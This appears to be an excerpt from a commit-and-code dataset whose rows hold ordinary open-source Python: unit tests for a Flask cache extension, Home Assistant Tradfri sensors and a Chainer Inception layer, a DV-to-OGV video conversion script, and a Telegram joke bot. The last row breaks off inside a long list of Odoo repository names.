commit stringlengths 40 40 | subject stringlengths 4 1.73k | repos stringlengths 5 127k | old_file stringlengths 2 751 | new_file stringlengths 2 751 | new_contents stringlengths 1 8.98k | old_contents stringlengths 0 6.59k | license stringclasses 13 values | lang stringclasses 23 values |
|---|---|---|---|---|---|---|---|---|
d5250790d3509dfe4cbd1f507c83a92bef9614fe | Test cache instance. | soasme/Flask-CacheOBJ,liwushuo/Flask-CacheOBJ | tests.py | tests.py | # -*- coding: utf-8 -*-
import pytest
from flask import Flask
from flask.ext.cacheobj import FlaskCacheOBJ, Msgpackable
app = Flask(__name__)
cache = FlaskCacheOBJ()
cache.init_app(app)
@pytest.fixture
def app(request):
app = Flask(__name__)
ctx = app.app_context()
ctx.push()
request.addfinalizer(ctx.pop)
return app
@pytest.fixture
def cache(app, request):
cache = FlaskCacheOBJ()
app.config['CACHE_HOST'] = 'localhost'
cache.init_app(app)
request.addfinalizer(cache.mc._flushall)
return cache
def test_mc_initialized(cache):
assert cache.mc
class Obj(Msgpackable):
def __init__(self, id):
self.id = id
def test_cache_obj(cache):
@cache.obj({'key': 'test_cache_obj:{id}', 'expire': 1})
def get(id):
return Obj(id)
assert not cache.mc.get('test_cache_obj:1')
assert get(1)
assert cache.mc.get('test_cache_obj:1')
assert get(1)
def test_cache_list(cache):
@cache.list({'key': 'test_cache_list:{id}', 'expire': 1})
def get(id):
return range(id)
assert not cache.mc.smembers('test_cache_list:1')
assert get(1)
assert cache.mc.exists('test_cache_list:1')
assert get(1)
def test_cache_hash(cache):
@cache.hash({'key': '{id}', 'hash_key': 'item', 'expire': 1})
def get(id):
return Obj(1)
assert not cache.mc.hget('item', '1')
assert get(1)
assert cache.mc.hget('item', '1')
assert get(1)
def test_cache_counter(cache):
@cache.counter({'key': 'test_cache_counter:{id}', 'expire': 1})
def get(id):
return int(id)
assert not cache.mc.get('test_cache_counter:1')
assert get(1)
assert int(cache.mc.get('test_cache_counter:1'))
assert get(1)
| mit | Python | |
e87fb6fc09e70dbcd9c65d183c0addb1b290ffcf | Add test cases for Tradfri sensor platform (#64165) | nkgilley/home-assistant,GenericStudent/home-assistant,mezz64/home-assistant,rohitranjan1991/home-assistant,w1ll1am23/home-assistant,toddeye/home-assistant,rohitranjan1991/home-assistant,rohitranjan1991/home-assistant,nkgilley/home-assistant,GenericStudent/home-assistant,toddeye/home-assistant,mezz64/home-assistant,w1ll1am23/home-assistant | tests/components/tradfri/test_sensor.py | tests/components/tradfri/test_sensor.py | """Tradfri sensor platform tests."""
from unittest.mock import MagicMock, Mock
from .common import setup_integration
def mock_sensor(state_name: str, state_value: str, device_number=0):
"""Mock a tradfri sensor."""
dev_info_mock = MagicMock()
dev_info_mock.manufacturer = "manufacturer"
dev_info_mock.model_number = "model"
dev_info_mock.firmware_version = "1.2.3"
# Set state value, eg battery_level = 50
setattr(dev_info_mock, state_name, state_value)
_mock_sensor = Mock(
id=f"mock-sensor-id-{device_number}",
reachable=True,
observe=Mock(),
device_info=dev_info_mock,
has_light_control=False,
has_socket_control=False,
has_blind_control=False,
has_signal_repeater_control=False,
has_air_purifier_control=False,
)
_mock_sensor.name = f"tradfri_sensor_{device_number}"
return _mock_sensor
async def test_battery_sensor(hass, mock_gateway, mock_api_factory):
"""Test that a battery sensor is correctly added."""
mock_gateway.mock_devices.append(
mock_sensor(state_name="battery_level", state_value=60)
)
await setup_integration(hass)
sensor_1 = hass.states.get("sensor.tradfri_sensor_0")
assert sensor_1 is not None
assert sensor_1.state == "60"
assert sensor_1.attributes["unit_of_measurement"] == "%"
assert sensor_1.attributes["device_class"] == "battery"
async def test_sensor_observed(hass, mock_gateway, mock_api_factory):
"""Test that sensors are correctly observed."""
sensor = mock_sensor(state_name="battery_level", state_value=60)
mock_gateway.mock_devices.append(sensor)
await setup_integration(hass)
assert len(sensor.observe.mock_calls) > 0
async def test_sensor_available(hass, mock_gateway, mock_api_factory):
"""Test sensor available property."""
sensor = mock_sensor(state_name="battery_level", state_value=60, device_number=1)
sensor.reachable = True
sensor2 = mock_sensor(state_name="battery_level", state_value=60, device_number=2)
sensor2.reachable = False
mock_gateway.mock_devices.append(sensor)
mock_gateway.mock_devices.append(sensor2)
await setup_integration(hass)
assert hass.states.get("sensor.tradfri_sensor_1").state == "60"
assert hass.states.get("sensor.tradfri_sensor_2").state == "unavailable"
| apache-2.0 | Python | |
5938881e939ce5088974489a943bd7d86925732f | Add unittest for inception | jnishi/chainer,ytoyama/yans_chainer_hackathon,masia02/chainer,minhpqn/chainer,hvy/chainer,t-abe/chainer,muupan/chainer,yanweifu/chainer,anaruse/chainer,ktnyt/chainer,okuta/chainer,hvy/chainer,muupan/chainer,sinhrks/chainer,wkentaro/chainer,hvy/chainer,okuta/chainer,sinhrks/chainer,cupy/cupy,jnishi/chainer,niboshi/chainer,chainer/chainer,cemoody/chainer,chainer/chainer,pfnet/chainer,kiyukuta/chainer,truongdq/chainer,kuwa32/chainer,ktnyt/chainer,niboshi/chainer,sou81821/chainer,hvy/chainer,tkerola/chainer,keisuke-umezawa/chainer,delta2323/chainer,ikasumi/chainer,benob/chainer,benob/chainer,rezoo/chainer,kikusu/chainer,jnishi/chainer,keisuke-umezawa/chainer,cupy/cupy,niboshi/chainer,ktnyt/chainer,chainer/chainer,ktnyt/chainer,keisuke-umezawa/chainer,woodshop/complex-chainer,chainer/chainer,okuta/chainer,hidenori-t/chainer,wkentaro/chainer,ronekko/chainer,wkentaro/chainer,tigerneil/chainer,Kaisuke5/chainer,tscohen/chainer,t-abe/chainer,wavelets/chainer,kashif/chainer,kikusu/chainer,aonotas/chainer,niboshi/chainer,ysekky/chainer,cupy/cupy,AlpacaDB/chainer,keisuke-umezawa/chainer,woodshop/chainer,laysakura/chainer,1986ks/chainer,okuta/chainer,AlpacaDB/chainer,jnishi/chainer,wkentaro/chainer,cupy/cupy,truongdq/chainer,umitanuki/chainer | tests/functions_tests/test_inception.py | tests/functions_tests/test_inception.py | import unittest
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
if cuda.available:
cuda.init()
class TestInception(unittest.TestCase):
in_channels = 3
out1, proj3, out3, proj5, out5, proj_pool = 3, 2, 3, 2, 3, 3
def setUp(self):
self.x = numpy.random.uniform(-1, 1, (10, self.in_channels, 5, 5)).astype(numpy.float32)
out = self.out1 + self.out3 + self.out5 + self.proj_pool
self.gy = numpy.random.uniform(-1, 1, (10, out, 5, 5)).astype(numpy.float32)
self.f = functions.Inception(self.in_channels, self.out1, self.proj3, self.out3, self.proj5, self.out5, self.proj_pool)
def check_forward(self, x_data):
x = chainer.Variable(x_data)
y = self.f(x)
@condition.retry(3)
def test_forward_cpu(self):
self.check_forward(self.x)
@condition.retry(3)
@attr.gpu
def test_forward_gpu(self):
self.f.to_gpu()
self.check_forward(cuda.to_gpu(self.x))
def check_backward(self, x_data, y_grad):
x = chainer.Variable(x_data)
y = self.f(x)
y.grad = y_grad
y.backward()
@condition.retry(3)
def test_backward_cpu(self):
self.check_backward(self.x, self.gy)
@condition.retry(3)
@attr.gpu
def test_backward_gpu(self):
self.f.to_gpu()
self.check_backward(cuda.to_gpu(self.x), cuda.to_gpu(self.gy))
testing.run_module(__name__, __file__)
| mit | Python | |
92a911a53158a89f0bd7f7e989de47f1854268ff | make ogvs for just one episode | xfxf/veyepar,CarlFK/veyepar,CarlFK/veyepar,CarlFK/veyepar,yoe/veyepar,xfxf/veyepar,yoe/veyepar,yoe/veyepar,xfxf/veyepar,CarlFK/veyepar,EricSchles/veyepar,yoe/veyepar,CarlFK/veyepar,xfxf/veyepar,yoe/veyepar,EricSchles/veyepar,EricSchles/veyepar,xfxf/veyepar,EricSchles/veyepar,EricSchles/veyepar | dj/scripts/dv2ogv.py | dj/scripts/dv2ogv.py | #!/usr/bin/python
# makes .ogv for all dv in a show
import os
import subprocess
from process import process
from main.models import Client, Show, Location, Episode, Raw_File, Cut_List
class mkpreview(process):
def one_dv(self,loc_dir,dv):
print dv.filename,
src = os.path.join(loc_dir,dv.filename)
dst = os.path.join(loc_dir,dv.basename()+'.ogv')
print os.path.exists(dst)
if (not os.path.exists(dst)) or self.options.whack:
cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --keyint 256".split()
# cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --height 240 --framerate 2 --keyint 256 --channels 1".split()
# cmd="ffmpeg2theora --videoquality 10 --videobitrate 16778 --optimize --audioquality 10 --audiobitrate 500 --keyint 1".split()
cmd+=[ src, '-o', dst, ]
# print ' '.join(cmd)
if self.options.test:
print "testing"
else:
p=subprocess.Popen(cmd).wait()
return
def process_ep(self, ep):
dir=os.path.join(self.show_dir,'dv',ep.location.slug)
dvs = Raw_File.objects.filter(cut_list__episode=ep)
for dv in dvs:
self.one_dv(dir,dv)
return True
"""
def one_loc(self,location,dir):
for dv in Raw_File.objects.filter(location=location):
self.one_dv(dir,dv)
def one_show(self, show):
self.set_dirs(show)
for loc in Location.objects.filter(show=show):
dir=os.path.join(self.show_dir,'dv',loc.slug)
if self.options.verbose: print show,loc,dir
self.one_loc(loc, dir)
def work(self):
# find and process show
if self.options.client and self.options.show:
client = Client.objects.get(slug=self.options.client)
show = Show.objects.get(client=client, slug=self.options.show)
self.one_show(show)
return
def add_more_options(self, parser):
parser.add_option('-o', '--orphans', action='store_true',
help='process orpahans (too?)' )
"""
if __name__=='__main__':
p=mkpreview()
p.main()
| #!/usr/bin/python
# makes .ogv for all dv in a show
import os
import subprocess
from process import process
from main.models import Client, Show, Location, Episode, Raw_File, Cut_List
class mkpreview(process):
def one_dv(self,loc_dir,dv):
src = os.path.join(loc_dir,dv.filename)
dst = os.path.join(loc_dir,dv.basename()+'.ogv')
if not os.path.exists(dst):
cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --keyint 256".split()
# cmd="ffmpeg2theora --videoquality 1 --audioquality 3 --audiobitrate 48 --speedlevel 2 --width 360 --height 240 --framerate 2 --keyint 256 --channels 1".split()
# cmd="ffmpeg2theora --videoquality 10 --videobitrate 16778 --optimize --audioquality 10 --audiobitrate 500 --keyint 1".split()
cmd+=[ src, '-o', dst, ]
print ' '.join(cmd)
p=subprocess.Popen(cmd).wait()
return
"""
def process_ep(self, ep):
dir=os.path.join(self.show_dir,'dv',ep.location.slug)
dvs = Raw_File.objects.filter(cut_list__episode=ep)
for dv in dvs:
self.one_dv(dir,dv)
return True
"""
def one_loc(self,location,dir):
for dv in Raw_File.objects.filter(location=location):
self.one_dv(dir,dv)
def one_show(self, show):
self.set_dirs(show)
for loc in Location.objects.filter(show=show):
dir=os.path.join(self.show_dir,'dv',loc.slug)
if self.options.verbose: print show,loc,dir
self.one_loc(loc, dir)
def work(self):
"""
find and process show
"""
if self.options.client and self.options.show:
client = Client.objects.get(slug=self.options.client)
show = Show.objects.get(client=client, slug=self.options.show)
self.one_show(show)
return
def add_more_options(self, parser):
parser.add_option('-o', '--orphans', action='store_true',
help='csv file' )
if __name__=='__main__':
p=mkpreview()
p.main()
| mit | Python |
36756dbd6b287f8dc6d5629027a8fe75d0f4bb09 | Add Chuck Norris bot to the team | farhaanbukhsh/Telegram-Bots | NorrisIsSoFunny_bot.py | NorrisIsSoFunny_bot.py | import telegram
LAST_UPDATE_ID = None
def main():
''' This is the main function that has to be called '''
global LAST_UPDATE_ID
# Telegram Bot Authorization Token
bot = telegram.Bot('put your token here')
# This will be our global variable to keep the latest update_id when requesting
# for updates. It starts with the latest update_id if available.
try:
LAST_UPDATE_ID = bot.getUpdates()[-1].update_id
except IndexError:
LAST_UPDATE_ID = None
while True:
fetch_url(bot)
def list_compare(first_list, second_list):
''' Function to compare two list and return the index of first matched index'''
for word in first_list:
if word in second_list:
return second_list.index(word)
return -1
def fetch_url(bot):
    """Fetch pending Telegram updates and reply to each recognised message.

    Known slash-commands get a canned reply; any message containing one of
    the "magic words" (or the explicit /more bot mention) triggers a random
    Chuck Norris joke fetched from the ICNDb API.
    """
    global LAST_UPDATE_ID
    # Hoisted out of the per-update loop: importing once per call is enough.
    import requests
    import json

    # Following is a dictionary of commands that the bot can use
    commands = {'/help':"Jokes are what I am made for, my speciality is Chuck Norris", '/start':'I am here to give you more jokes about Chuck Norris, because he is the best'}
    # Any of these words anywhere in a message requests another joke.
    magic_words = ['more','More','/more','/More']
    for update in bot.getUpdates(offset=LAST_UPDATE_ID, timeout=10):
        chat_id = update.message.chat_id
        message = update.message.text.encode('utf-8')
        message_list = message.split()
        if(message in commands):
            bot.sendMessage(chat_id=chat_id, text=commands[message])
        # Name of my bot is NorrisIsFunny_bot replace your bot name with this
        if ( list_compare(magic_words, message_list)!= -1 or message == '/more@NorrisIsSoFunny_bot'):
            url = 'http://api.icndb.com/jokes/random'
            myResponse = requests.get(url)
            if (myResponse.ok):
                jData = json.loads(myResponse.content)
                jValue = jData.get('value')
                jJoke = str(jValue.get('joke'))
                bot.sendMessage(chat_id=chat_id, text=jJoke)
        # Bug fix: always advance the offset, even when nothing matched.
        # Previously it was only advanced inside the matching branches, so
        # any unrecognised message was re-fetched forever on every poll.
        LAST_UPDATE_ID = update.update_id + 1
if __name__ == '__main__':
    # Run the polling loop when executed as a script.
    main()
| mit | Python | |
924ef1395214c2f71b96c21f41e240c88f0570a1 | Add project_security.xml file entry in update_xml section | gavin-feng/odoo,hip-odoo/odoo,SerpentCS/odoo,OpusVL/odoo,ecosoft-odoo/odoo,abstract-open-solutions/OCB,ojengwa/odoo,cloud9UG/odoo,spadae22/odoo,chiragjogi/odoo,rdeheele/odoo,fevxie/odoo,gavin-feng/odoo,jolevq/odoopub,alhashash/odoo,ramitalat/odoo,numerigraphe/odoo,apanju/GMIO_Odoo,blaggacao/OpenUpgrade,shivam1111/odoo,joshuajan/odoo,KontorConsulting/odoo,stephen144/odoo,Danisan/odoo-1,OpenUpgrade/OpenUpgrade,codekaki/odoo,fevxie/odoo,ovnicraft/odoo,ccomb/OpenUpgrade,cdrooom/odoo,fgesora/odoo,GauravSahu/odoo,Ichag/odoo,savoirfairelinux/OpenUpgrade,poljeff/odoo,patmcb/odoo,collex100/odoo,alexteodor/odoo,ccomb/OpenUpgrade,goliveirab/odoo,tinkerthaler/odoo,hbrunn/OpenUpgrade,SerpentCS/odoo,gsmartway/odoo,deKupini/erp,juanalfonsopr/odoo,Maspear/odoo,BT-ojossen/odoo,nuncjo/odoo,gdgellatly/OCB1,OSSESAC/odoopubarquiluz,prospwro/odoo,bkirui/odoo,syci/OCB,doomsterinc/odoo,hip-odoo/odoo,datenbetrieb/odoo,syci/OCB,minhtuancn/odoo,cdrooom/odoo,RafaelTorrealba/odoo,hbrunn/OpenUpgrade,GauravSahu/odoo,glovebx/odoo,tvibliani/odoo,optima-ict/odoo,pplatek/odoo,hanicker/odoo,JCA-Developpement/Odoo,slevenhagen/odoo,fuhongliang/odoo,patmcb/odoo,slevenhagen/odoo-npg,ecosoft-odoo/odoo,realsaiko/odoo,Nowheresly/odoo,Maspear/odoo,rubencabrera/odoo,slevenhagen/odoo-npg,jpshort/odoo,nitinitprof/odoo,jusdng/odoo,odooindia/odoo,VitalPet/odoo,tinkerthaler/odoo,Ernesto99/odoo,SerpentCS/odoo,podemos-info/odoo,shingonoide/odoo,dezynetechnologies/odoo,diagramsoftware/odoo,provaleks/o8,acshan/odoo,OpenPymeMx/OCB,stonegithubs/odoo,dezynetechnologies/odoo,javierTerry/odoo,codekaki/odoo,slevenhagen/odoo,cloud9UG/odoo,CubicERP/odoo,acshan/odoo,acshan/odoo,credativUK/OCB,erkrishna9/odoo,abdellatifkarroum/odoo,stonegithubs/odoo,lombritz/odoo,bplancher/odoo,Eric-Zhong/odoo,prospwro/odoo,alexcuellar/odoo,alqfahad/odoo,nhomar/odoo-mirror,KontorConsulting/odoo,kybriainfotech/iSocioCRM,synconics/odoo,lightcn/od
oo,fevxie/odoo,tinkerthaler/odoo,markeTIC/OCB,apanju/GMIO_Odoo,erkrishna9/odoo,hifly/OpenUpgrade,rdeheele/odoo,pedrobaeza/OpenUpgrade,OpenUpgrade/OpenUpgrade,gorjuce/odoo,OpenPymeMx/OCB,Gitlab11/odoo,abdellatifkarroum/odoo,Endika/odoo,Daniel-CA/odoo,frouty/odoo_oph,highco-groupe/odoo,credativUK/OCB,ramadhane/odoo,alexcuellar/odoo,omprakasha/odoo,srimai/odoo,rschnapka/odoo,zchking/odoo,matrixise/odoo,luistorresm/odoo,VielSoft/odoo,ehirt/odoo,Elico-Corp/odoo_OCB,cysnake4713/odoo,JGarcia-Panach/odoo,SerpentCS/odoo,bguillot/OpenUpgrade,Nick-OpusVL/odoo,mkieszek/odoo,srimai/odoo,tinkhaven-organization/odoo,fjbatresv/odoo,gvb/odoo,fevxie/odoo,glovebx/odoo,bguillot/OpenUpgrade,simongoffin/website_version,frouty/odoo_oph,waytai/odoo,credativUK/OCB,elmerdpadilla/iv,guewen/OpenUpgrade,Antiun/odoo,takis/odoo,QianBIG/odoo,ThinkOpen-Solutions/odoo,markeTIC/OCB,apanju/GMIO_Odoo,takis/odoo,ccomb/OpenUpgrade,odoo-turkiye/odoo,incaser/odoo-odoo,mvaled/OpenUpgrade,cysnake4713/odoo,oasiswork/odoo,florentx/OpenUpgrade,tvibliani/odoo,frouty/odoo_oph,arthru/OpenUpgrade,lsinfo/odoo,leorochael/odoo,dsfsdgsbngfggb/odoo,bakhtout/odoo-educ,rahuldhote/odoo,alhashash/odoo,grap/OpenUpgrade,dgzurita/odoo,draugiskisprendimai/odoo,CatsAndDogsbvba/odoo,doomsterinc/odoo,sysadminmatmoz/OCB,brijeshkesariya/odoo,OpenPymeMx/OCB,microcom/odoo,aviciimaxwell/odoo,ingadhoc/odoo,alexcuellar/odoo,deKupini/erp,ramitalat/odoo,n0m4dz/odoo,wangjun/odoo,colinnewell/odoo,savoirfairelinux/odoo,oasiswork/odoo,datenbetrieb/odoo,sinbazhou/odoo,tinkhaven-organization/odoo,funkring/fdoo,luistorresm/odoo,glovebx/odoo,mustafat/odoo-1,fdvarela/odoo8,hbrunn/OpenUpgrade,gdgellatly/OCB1,jfpla/odoo,Drooids/odoo,provaleks/o8,tvtsoft/odoo8,slevenhagen/odoo-npg,virgree/odoo,QianBIG/odoo,cysnake4713/odoo,gsmartway/odoo,fuselock/odoo,goliveirab/odoo,windedge/odoo,rowemoore/odoo,KontorConsulting/odoo,Eric-Zhong/odoo,VielSoft/odoo,n0m4dz/odoo,jolevq/odoopub,ingadhoc/odoo,apocalypsebg/odoo,diagramsoftware/odoo,kirca/OpenUpgrade,tangyiyo
ng/odoo,shaufi/odoo,shingonoide/odoo,ovnicraft/odoo,ingadhoc/odoo,dsfsdgsbngfggb/odoo,RafaelTorrealba/odoo,JonathanStein/odoo,demon-ru/iml-crm,nexiles/odoo,markeTIC/OCB,VielSoft/odoo,gvb/odoo,Kilhog/odoo,andreparames/odoo,nagyistoce/odoo-dev-odoo,Eric-Zhong/odoo,minhtuancn/odoo,osvalr/odoo,shaufi/odoo,mlaitinen/odoo,ThinkOpen-Solutions/odoo,PongPi/isl-odoo,oliverhr/odoo,elmerdpadilla/iv,agrista/odoo-saas,bwrsandman/OpenUpgrade,thanhacun/odoo,factorlibre/OCB,RafaelTorrealba/odoo,Grirrane/odoo,ovnicraft/odoo,nuuuboo/odoo,Grirrane/odoo,arthru/OpenUpgrade,rahuldhote/odoo,dkubiak789/odoo,mustafat/odoo-1,jesramirez/odoo,slevenhagen/odoo,Grirrane/odoo,nhomar/odoo,bkirui/odoo,klunwebale/odoo,dgzurita/odoo,Maspear/odoo,csrocha/OpenUpgrade,csrocha/OpenUpgrade,savoirfairelinux/OpenUpgrade,provaleks/o8,alexteodor/odoo,xujb/odoo,lgscofield/odoo,rahuldhote/odoo,oasiswork/odoo,lightcn/odoo,grap/OCB,idncom/odoo,jesramirez/odoo,numerigraphe/odoo,csrocha/OpenUpgrade,addition-it-solutions/project-all,ThinkOpen-Solutions/odoo,CatsAndDogsbvba/odoo,sebalix/OpenUpgrade,bealdav/OpenUpgrade,hbrunn/OpenUpgrade,patmcb/odoo,dsfsdgsbngfggb/odoo,apocalypsebg/odoo,bealdav/OpenUpgrade,jiachenning/odoo,zchking/odoo,jpshort/odoo,minhtuancn/odoo,makinacorpus/odoo,csrocha/OpenUpgrade,dgzurita/odoo,kifcaliph/odoo,tarzan0820/odoo,BT-astauder/odoo,bobisme/odoo,realsaiko/odoo,credativUK/OCB,alqfahad/odoo,camptocamp/ngo-addons-backport,sinbazhou/odoo,apanju/odoo,zchking/odoo,NeovaHealth/odoo,steedos/odoo,stephen144/odoo,kifcaliph/odoo,chiragjogi/odoo,virgree/odoo,rdeheele/odoo,ehirt/odoo,steedos/odoo,brijeshkesariya/odoo,jpshort/odoo,waytai/odoo,KontorConsulting/odoo,vnsofthe/odoo,Kilhog/odoo,Ernesto99/odoo,dalegregory/odoo,apocalypsebg/odoo,hassoon3/odoo,pedrobaeza/OpenUpgrade,tinkhaven-organization/odoo,stephen144/odoo,camptocamp/ngo-addons-backport,Bachaco-ve/odoo,colinnewell/odoo,apanju/GMIO_Odoo,Eric-Zhong/odoo,juanalfonsopr/odoo,rgeleta/odoo,havt/odoo,podemos-info/odoo,bkirui/odoo,sv-dev1/odoo,jfpla/
odoo,sinbazhou/odoo,ApuliaSoftware/odoo,lightcn/odoo,Nowheresly/odoo,highco-groupe/odoo,alqfahad/odoo,prospwro/odoo,cpyou/odoo,christophlsa/odoo,SAM-IT-SA/odoo,guewen/OpenUpgrade,gorjuce/odoo,ccomb/OpenUpgrade,leorochael/odoo,sebalix/OpenUpgrade,odoo-turkiye/odoo,Nowheresly/odoo,Maspear/odoo,collex100/odoo,ojengwa/odoo,Endika/OpenUpgrade,RafaelTorrealba/odoo,vnsofthe/odoo,steedos/odoo,frouty/odoo_oph,Daniel-CA/odoo,vrenaville/ngo-addons-backport,gdgellatly/OCB1,janocat/odoo,joshuajan/odoo,massot/odoo,florentx/OpenUpgrade,ramadhane/odoo,Maspear/odoo,funkring/fdoo,FlorianLudwig/odoo,Adel-Magebinary/odoo,ramadhane/odoo,guerrerocarlos/odoo,juanalfonsopr/odoo,ramadhane/odoo,srsman/odoo,grap/OCB,oihane/odoo,dllsf/odootest,Nowheresly/odoo,fjbatresv/odoo,odootr/odoo,hopeall/odoo,minhtuancn/odoo,Bachaco-ve/odoo,rgeleta/odoo,JGarcia-Panach/odoo,gdgellatly/OCB1,rowemoore/odoo,JGarcia-Panach/odoo,janocat/odoo,Bachaco-ve/odoo,aviciimaxwell/odoo,ChanduERP/odoo,OpenUpgrade-dev/OpenUpgrade,luiseduardohdbackup/odoo,KontorConsulting/odoo,colinnewell/odoo,zchking/odoo,Drooids/odoo,Bachaco-ve/odoo,hoatle/odoo,thanhacun/odoo,fuhongliang/odoo,Ernesto99/odoo,janocat/odoo,FlorianLudwig/odoo,PongPi/isl-odoo,nexiles/odoo,ShineFan/odoo,hmen89/odoo,gavin-feng/odoo,grap/OCB,VitalPet/odoo,xzYue/odoo,credativUK/OCB,gorjuce/odoo,0k/OpenUpgrade,salaria/odoo,shaufi/odoo,dkubiak789/odoo,CubicERP/odoo,AuyaJackie/odoo,damdam-s/OpenUpgrade,JCA-Developpement/Odoo,joariasl/odoo,NeovaHealth/odoo,jeasoft/odoo,gvb/odoo,thanhacun/odoo,avoinsystems/odoo,leoliujie/odoo,0k/odoo,BT-fgarbely/odoo,CopeX/odoo,NL66278/OCB,BT-rmartin/odoo,luiseduardohdbackup/odoo,shaufi10/odoo,NeovaHealth/odoo,joariasl/odoo,arthru/OpenUpgrade,ihsanudin/odoo,hubsaysnuaa/odoo,OpenUpgrade-dev/OpenUpgrade,markeTIC/OCB,oihane/odoo,storm-computers/odoo,MarcosCommunity/odoo,gdgellatly/OCB1,xzYue/odoo,nuncjo/odoo,colinnewell/odoo,jolevq/odoopub,chiragjogi/odoo,leoliujie/odoo,synconics/odoo,blaggacao/OpenUpgrade,storm-computers/odoo,x111ong/od
oo,BT-fgarbely/odoo,simongoffin/website_version,fgesora/odoo,tarzan0820/odoo,provaleks/o8,Codefans-fan/odoo,bwrsandman/OpenUpgrade,bobisme/odoo,idncom/odoo,abstract-open-solutions/OCB,dsfsdgsbngfggb/odoo,nexiles/odoo,draugiskisprendimai/odoo,kirca/OpenUpgrade,ramitalat/odoo,NeovaHealth/odoo,ingadhoc/odoo,cedk/odoo,acshan/odoo,rgeleta/odoo,ClearCorp-dev/odoo,CubicERP/odoo,guewen/OpenUpgrade,rubencabrera/odoo,sadleader/odoo,nexiles/odoo,bplancher/odoo,laslabs/odoo,hubsaysnuaa/odoo,inspyration/odoo,Antiun/odoo,janocat/odoo,tinkerthaler/odoo,brijeshkesariya/odoo,charbeljc/OCB,markeTIC/OCB,dfang/odoo,ramadhane/odoo,AuyaJackie/odoo,Drooids/odoo,deKupini/erp,andreparames/odoo,nhomar/odoo-mirror,kirca/OpenUpgrade,Kilhog/odoo,MarcosCommunity/odoo,takis/odoo,syci/OCB,shivam1111/odoo,odoousers2014/odoo,charbeljc/OCB,BT-rmartin/odoo,tangyiyong/odoo,cedk/odoo,abenzbiria/clients_odoo,n0m4dz/odoo,florentx/OpenUpgrade,vrenaville/ngo-addons-backport,JGarcia-Panach/odoo,stonegithubs/odoo,ujjwalwahi/odoo,sve-odoo/odoo,BT-ojossen/odoo,rschnapka/odoo,fossoult/odoo,laslabs/odoo,gsmartway/odoo,brijeshkesariya/odoo,lightcn/odoo,Eric-Zhong/odoo,shaufi/odoo,CubicERP/odoo,cdrooom/odoo,Endika/odoo,massot/odoo,kittiu/odoo,hubsaysnuaa/odoo,savoirfairelinux/OpenUpgrade,draugiskisprendimai/odoo,dariemp/odoo,dfang/odoo,waytai/odoo,jiachenning/odoo,jaxkodex/odoo,ehirt/odoo,markeTIC/OCB,numerigraphe/odoo,addition-it-solutions/project-all,AuyaJackie/odoo,inspyration/odoo,jusdng/odoo,glovebx/odoo,waytai/odoo,prospwro/odoo,sadleader/odoo,cedk/odoo,ehirt/odoo,tvtsoft/odoo8,factorlibre/OCB,oihane/odoo,draugiskisprendimai/odoo,omprakasha/odoo,rdeheele/odoo,windedge/odoo,rahuldhote/odoo,thanhacun/odoo,SerpentCS/odoo,joariasl/odoo,jaxkodex/odoo,mmbtba/odoo,oasiswork/odoo,srsman/odoo,ApuliaSoftware/odoo,AuyaJackie/odoo,frouty/odoogoeen,zchking/odoo,Danisan/odoo-1,jpshort/odoo,erkrishna9/odoo,x111ong/odoo,Drooids/odoo,xujb/odoo,hanicker/odoo,nuuuboo/odoo,funkring/fdoo,leorochael/odoo,glovebx/odoo,oliverhr/odoo
,fgesora/odoo,dkubiak789/odoo,Danisan/odoo-1,BT-rmartin/odoo,microcom/odoo,blaggacao/OpenUpgrade,CatsAndDogsbvba/odoo,salaria/odoo,odoo-turkiye/odoo,ramitalat/odoo,fuselock/odoo,vrenaville/ngo-addons-backport,OpusVL/odoo,apanju/odoo,abdellatifkarroum/odoo,nuncjo/odoo,fuselock/odoo,feroda/odoo,Drooids/odoo,vrenaville/ngo-addons-backport,leorochael/odoo,vnsofthe/odoo,bplancher/odoo,cedk/odoo,slevenhagen/odoo-npg,dezynetechnologies/odoo,Bachaco-ve/odoo,sve-odoo/odoo,kirca/OpenUpgrade,Elico-Corp/odoo_OCB,havt/odoo,demon-ru/iml-crm,lombritz/odoo,ApuliaSoftware/odoo,Endika/OpenUpgrade,BT-fgarbely/odoo,dfang/odoo,Endika/odoo,joariasl/odoo,havt/odoo,FlorianLudwig/odoo,diagramsoftware/odoo,acshan/odoo,FlorianLudwig/odoo,windedge/odoo,Danisan/odoo-1,Gitlab11/odoo,avoinsystems/odoo,takis/odoo,credativUK/OCB,gorjuce/odoo,sysadminmatmoz/OCB,virgree/odoo,goliveirab/odoo,fgesora/odoo,jesramirez/odoo,ubic135/odoo-design,funkring/fdoo,stonegithubs/odoo,avoinsystems/odoo,papouso/odoo,tvtsoft/odoo8,grap/OCB,apanju/odoo,takis/odoo,luistorresm/odoo,grap/OCB,lgscofield/odoo,shivam1111/odoo,optima-ict/odoo,Elico-Corp/odoo_OCB,fdvarela/odoo8,jeasoft/odoo,charbeljc/OCB,naousse/odoo,tinkerthaler/odoo,ingadhoc/odoo,savoirfairelinux/OpenUpgrade,Endika/odoo,christophlsa/odoo,fossoult/odoo,fdvarela/odoo8,hopeall/odoo,vrenaville/ngo-addons-backport,laslabs/odoo,apocalypsebg/odoo,JCA-Developpement/Odoo,tangyiyong/odoo,havt/odoo,jpshort/odoo,blaggacao/OpenUpgrade,nagyistoce/odoo-dev-odoo,zchking/odoo,srimai/odoo,QianBIG/odoo,fossoult/odoo,odoo-turkiye/odoo,gsmartway/odoo,fjbatresv/odoo,lombritz/odoo,gorjuce/odoo,salaria/odoo,jaxkodex/odoo,hoatle/odoo,chiragjogi/odoo,luiseduardohdbackup/odoo,spadae22/odoo,massot/odoo,OpenUpgrade/OpenUpgrade,Kilhog/odoo,oasiswork/odoo,collex100/odoo,Maspear/odoo,OpenUpgrade-dev/OpenUpgrade,TRESCLOUD/odoopub,pedrobaeza/OpenUpgrade,pedrobaeza/OpenUpgrade,spadae22/odoo,stonegithubs/odoo,shaufi10/odoo,SAM-IT-SA/odoo,frouty/odoo_oph,synconics/odoo,luistorresm/odoo,javierT
